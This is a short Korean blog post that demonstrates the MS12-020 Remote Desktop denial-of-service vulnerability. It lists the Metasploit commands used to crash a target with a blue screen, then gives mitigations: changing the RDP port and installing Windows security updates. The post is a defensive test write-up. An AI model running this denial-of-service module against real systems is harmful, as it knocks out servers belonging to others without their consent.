[BSOD] BackTrack을 이용한 RDP 취약점 테스트 / MS12-020 Microsoft Remote Desktop Use-After-Free DoS
원격 데스크톱의 취약점으로 인한 원격 코드 실행 문제점을 BackTrack을 통해 테스트 해보려고 합니다.
아래 취약점 코드가 실행될 경우 BSOD(Blue Screen of Deatch)가 실행됩니다.
참고 URL :
http://technet.microsoft.com/ko-kr/security/bulletin/ms12-020
http://www.exploit-db.com/exploits/18606/
# 테스트 방법
1. msfconsole 실행
2. msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.10.248 // Target IP 설정
msf auxiliary(ms12_020_maxchannelids) > set rport 3387 // 원격데스크탑 port 설정
4. exploit
테스트 시 Target의 BSOD는 실패하였지만 다른 시스템에 테스트하였을 시 아래와 같은 블루스크린을 확인할 수 있었습니다.
# 대응방법
1. 서버의 원격데스크톱 포트를 3389에서 다른 포트로 변경하여 공격 시도를 줄입니다.
원격데스크톱 포트 변경 방법 : http://tisiphone.tistory.com/11
2. 윈도우 보안 업데이트를 합니다.